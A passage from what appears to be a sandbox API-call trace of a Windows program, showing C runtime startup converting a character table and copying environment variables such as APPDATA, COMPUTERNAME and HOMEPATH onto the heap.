!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿüQf\x99äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0081.212] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0081.212] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0081.213] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x720e70) returned 0x80 [0081.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0081.268] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1f) returned 0x71eaf8 [0081.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x71eaf8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0081.316] GetLastError () returned 0x0 [0081.317] SetLastError (dwErrCode=0x0) [0081.317] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x4) returned 0x711a00 [0081.317] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x711a00) returned 0x4 [0081.317] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x711a00, Size=0x8) returned 0x711a00 [0081.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0081.317] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x2b) returned 0x71b400 [0081.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x71b400, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 43 [0081.317] GetLastError () returned 0x0 [0081.317] SetLastError (dwErrCode=0x0) [0081.317] GetLastError () returned 0x0 [0081.317] SetLastError (dwErrCode=0x0) [0081.317] GetLastError () returned 0x0 [0081.317] SetLastError (dwErrCode=0x0) [0081.344] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x711a00) returned 0x8 [0081.344] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x711a00, Size=0xc) returned 0x721568 [0081.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0081.344] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x37) returned 0x721580 [0081.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x721580, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0081.344] GetLastError () returned 0x0 [0081.344] SetLastError (dwErrCode=0x0) [0081.345] GetLastError () returned 0x0 [0081.345] SetLastError (dwErrCode=0x0) [0081.345] GetLastError () returned 0x0 [0081.345] SetLastError (dwErrCode=0x0) [0081.345] GetLastError () returned 0x0 [0081.345] SetLastError (dwErrCode=0x0) [0081.345] GetLastError () returned 0x0 [0081.345] SetLastError (dwErrCode=0x0) [0081.345] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721568) returned 0xc [0081.345] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721568, Size=0x10) returned 0x721568 [0081.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0081.345] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3c) returned 0x712508 [0081.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x712508, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0081.345] GetLastError () returned 0x0 [0081.345] SetLastError (dwErrCode=0x0) [0081.345] GetLastError () returned 0x0 [0081.345] SetLastError (dwErrCode=0x0) [0081.345] GetLastError () returned 0x0 [0081.345] SetLastError (dwErrCode=0x0) [0081.345] GetLastError () returned 0x0 [0081.345] SetLastError (dwErrCode=0x0) [0081.345] GetLastError () returned 0x0 [0081.345] SetLastError (dwErrCode=0x0) [0081.345] GetLastError () returned 0x0 [0081.346] SetLastError (dwErrCode=0x0) [0081.346] GetLastError () returned 0x0 [0081.346] SetLastError (dwErrCode=0x0) [0081.346] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721568) returned 0x10 [0081.346] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721568, Size=0x14) returned 0x7215c0 [0081.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0081.346] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x31) returned 0x7215e0 [0081.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x7215e0, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0081.346] GetLastError () returned 0x0 [0081.346] SetLastError (dwErrCode=0x0) [0081.346] GetLastError () returned 0x0 [0081.346] SetLastError (dwErrCode=0x0) [0081.346] GetLastError () returned 0x0 [0081.346] SetLastError (dwErrCode=0x0) [0081.346] GetLastError () returned 0x0 [0081.346] SetLastError (dwErrCode=0x0) [0081.346] GetLastError () returned 0x0 [0081.346] SetLastError (dwErrCode=0x0) [0081.346] GetLastError () returned 0x0 [0081.346] SetLastError (dwErrCode=0x0) [0081.346] GetLastError () returned 0x0 [0081.346] SetLastError (dwErrCode=0x0) [0081.346] GetLastError () returned 0x0 [0081.346] SetLastError (dwErrCode=0x0) [0081.346] GetLastError () returned 0x0 [0081.347] SetLastError (dwErrCode=0x0) [0081.347] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x7215c0) returned 0x14 [0081.347] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x7215c0, Size=0x18) returned 0x7215c0 [0081.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0081.347] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x18) returned 0x721620 [0081.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x721620, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 24 [0081.347] GetLastError () returned 0x0 [0081.347] SetLastError (dwErrCode=0x0) [0081.347] GetLastError () returned 0x0 [0081.347] SetLastError (dwErrCode=0x0) [0081.347] GetLastError () returned 0x0 [0081.347] SetLastError (dwErrCode=0x0) [0081.347] GetLastError () returned 0x0 [0081.347] SetLastError (dwErrCode=0x0) [0081.347] GetLastError () returned 0x0 [0081.347] SetLastError (dwErrCode=0x0) [0081.347] GetLastError () returned 0x0 [0081.347] SetLastError (dwErrCode=0x0) [0081.347] GetLastError () returned 0x0 [0081.347] SetLastError (dwErrCode=0x0) [0081.347] GetLastError () returned 0x0 [0081.347] SetLastError (dwErrCode=0x0) [0081.347] GetLastError () returned 0x0 [0081.347] SetLastError (dwErrCode=0x0) [0081.348] GetLastError () returned 0x0 [0081.348] SetLastError (dwErrCode=0x0) [0081.348] GetLastError () returned 0x0 [0081.348] SetLastError (dwErrCode=0x0) [0081.348] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x7215c0) returned 0x18 [0081.348] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x7215c0, Size=0x1c) returned 0x721640 [0081.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0081.348] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x24) returned 0x71ad30 [0081.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x71ad30, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0081.348] GetLastError () returned 0x0 [0081.348] SetLastError (dwErrCode=0x0) [0081.348] GetLastError () returned 0x0 [0081.348] SetLastError (dwErrCode=0x0) [0081.348] GetLastError () returned 0x0 [0081.348] SetLastError (dwErrCode=0x0) [0081.348] GetLastError () returned 0x0 [0081.348] SetLastError (dwErrCode=0x0) [0081.348] GetLastError () returned 0x0 [0081.348] SetLastError (dwErrCode=0x0) [0081.348] GetLastError () returned 0x0 [0081.348] SetLastError (dwErrCode=0x0) [0081.348] GetLastError () returned 0x0 [0081.348] SetLastError (dwErrCode=0x0) [0081.348] GetLastError () returned 0x0 [0081.349] SetLastError (dwErrCode=0x0) [0081.349] GetLastError () returned 0x0 [0081.349] SetLastError (dwErrCode=0x0) [0081.349] GetLastError () returned 0x0 [0081.349] SetLastError (dwErrCode=0x0) [0081.349] GetLastError () returned 0x0 [0081.349] SetLastError (dwErrCode=0x0) [0081.349] GetLastError () returned 0x0 [0081.349] SetLastError (dwErrCode=0x0) [0081.349] GetLastError () returned 0x0 [0081.349] SetLastError (dwErrCode=0x0) [0081.349] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721640) returned 0x1c [0081.349] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721640, Size=0x20) returned 0x721640 [0081.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0081.349] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x14) returned 0x7215c0 [0081.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x7215c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0081.349] GetLastError () returned 0x0 [0081.349] SetLastError (dwErrCode=0x0) [0081.349] GetLastError () returned 0x0 [0081.349] SetLastError (dwErrCode=0x0) [0081.349] GetLastError () returned 0x0 [0081.349] SetLastError (dwErrCode=0x0) [0081.349] GetLastError () returned 0x0 [0081.349] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] GetLastError () returned 0x0 [0081.350] SetLastError (dwErrCode=0x0) [0081.350] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721640) returned 0x20 [0081.350] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721640, Size=0x24) returned 0x721640 [0081.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.351] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xd) returned 0x7131c0 [0081.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x7131c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0081.351] GetLastError () returned 0x0 [0081.351] SetLastError (dwErrCode=0x0) [0081.351] GetLastError () returned 0x0 [0081.351] SetLastError (dwErrCode=0x0) [0081.351] GetLastError () returned 0x0 [0081.351] SetLastError (dwErrCode=0x0) [0081.351] GetLastError () returned 0x0 [0081.351] SetLastError (dwErrCode=0x0) [0081.351] GetLastError () returned 0x0 [0081.351] SetLastError (dwErrCode=0x0) [0081.351] GetLastError () returned 0x0 [0081.351] SetLastError (dwErrCode=0x0) [0081.351] GetLastError () returned 0x0 [0081.351] SetLastError (dwErrCode=0x0) [0081.351] GetLastError () returned 0x0 [0081.351] SetLastError (dwErrCode=0x0) [0081.351] GetLastError () returned 0x0 [0081.351] SetLastError (dwErrCode=0x0) [0081.351] GetLastError () returned 0x0 [0081.352] SetLastError (dwErrCode=0x0) [0081.352] GetLastError () returned 0x0 [0081.352] SetLastError (dwErrCode=0x0) [0081.352] GetLastError () returned 0x0 [0081.352] SetLastError (dwErrCode=0x0) [0081.352] GetLastError () returned 0x0 [0081.352] SetLastError (dwErrCode=0x0) [0081.352] GetLastError () returned 0x0 [0081.352] SetLastError (dwErrCode=0x0) [0081.352] GetLastError () returned 0x0 [0081.352] SetLastError (dwErrCode=0x0) [0081.352] GetLastError () returned 0x0 [0081.353] SetLastError (dwErrCode=0x0) [0081.353] GetLastError () returned 0x0 [0081.353] SetLastError (dwErrCode=0x0) [0081.353] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721640) returned 0x24 [0081.353] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721640, Size=0x28) returned 0x721640 [0081.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0081.353] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1a) returned 0x71eb20 [0081.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x71eb20, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 26 [0081.353] GetLastError () returned 0x0 [0081.353] SetLastError (dwErrCode=0x0) [0081.353] GetLastError () returned 0x0 [0081.353] SetLastError (dwErrCode=0x0) [0081.353] GetLastError () returned 0x0 [0081.353] SetLastError (dwErrCode=0x0) [0081.353] GetLastError () returned 0x0 [0081.353] SetLastError (dwErrCode=0x0) [0081.353] GetLastError () returned 0x0 [0081.353] SetLastError (dwErrCode=0x0) [0081.353] GetLastError () returned 0x0 [0081.353] SetLastError (dwErrCode=0x0) [0081.353] GetLastError () returned 0x0 [0081.353] SetLastError (dwErrCode=0x0) [0081.353] GetLastError () returned 0x0 [0081.353] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] GetLastError () returned 0x0 [0081.354] SetLastError (dwErrCode=0x0) [0081.354] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721640) returned 0x28 [0081.355] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721640, Size=0x2c) returned 0x721640 [0081.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0081.355] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x2e) returned 0x71b438 [0081.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x71b438, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", lpUsedDefaultChar=0x0) returned 46 [0081.355] GetLastError () returned 0x0 [0081.355] SetLastError (dwErrCode=0x0) [0081.355] GetLastError () returned 0x0 [0081.355] SetLastError (dwErrCode=0x0) [0081.355] GetLastError () returned 0x0 [0081.355] SetLastError (dwErrCode=0x0) [0081.355] GetLastError () returned 0x0 [0081.355] SetLastError (dwErrCode=0x0) [0081.355] GetLastError () returned 0x0 [0081.355] SetLastError (dwErrCode=0x0) [0081.355] GetLastError () returned 0x0 [0081.355] SetLastError (dwErrCode=0x0) [0081.355] GetLastError () returned 0x0 [0081.355] SetLastError (dwErrCode=0x0) [0081.355] GetLastError () returned 0x0 [0081.355] SetLastError (dwErrCode=0x0) [0081.355] GetLastError () returned 0x0 [0081.355] SetLastError (dwErrCode=0x0) [0081.355] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721640) returned 0x2c [0081.357] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721640, Size=0x30) returned 0x721640 [0081.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0081.357] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x19) returned 0x71eb48 [0081.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x71eb48, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 25 [0081.357] GetLastError () returned 0x0 [0081.357] SetLastError (dwErrCode=0x0) [0081.357] GetLastError () returned 0x0 [0081.357] SetLastError (dwErrCode=0x0) [0081.357] GetLastError () returned 0x0 [0081.357] SetLastError (dwErrCode=0x0) [0081.357] GetLastError () returned 0x0 [0081.357] SetLastError (dwErrCode=0x0) [0081.357] GetLastError () returned 0x0 [0081.357] SetLastError (dwErrCode=0x0) [0081.357] GetLastError () returned 0x0 [0081.357] SetLastError (dwErrCode=0x0) [0081.357] GetLastError () returned 0x0 [0081.357] SetLastError (dwErrCode=0x0) [0081.357] GetLastError () returned 0x0 [0081.357] SetLastError (dwErrCode=0x0) [0081.357] GetLastError () returned 0x0 [0081.357] SetLastError (dwErrCode=0x0) [0081.357] GetLastError () returned 0x0 [0081.357] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.358] SetLastError (dwErrCode=0x0) [0081.358] GetLastError () returned 0x0 [0081.359] SetLastError (dwErrCode=0x0) [0081.359] GetLastError () returned 0x0 [0081.359] SetLastError (dwErrCode=0x0) [0081.359] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x721640) returned 0x30 [0081.359] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x721640, Size=0x34) returned 0x721640 [0081.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0081.359] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x17) returned 0x721680 [0081.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x721680, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0081.359] GetLastError () returned 0x0 [0081.359] SetLastError (dwErrCode=0x0) [0081.359] GetLastError () returned 0x0 [0081.359] SetLastError 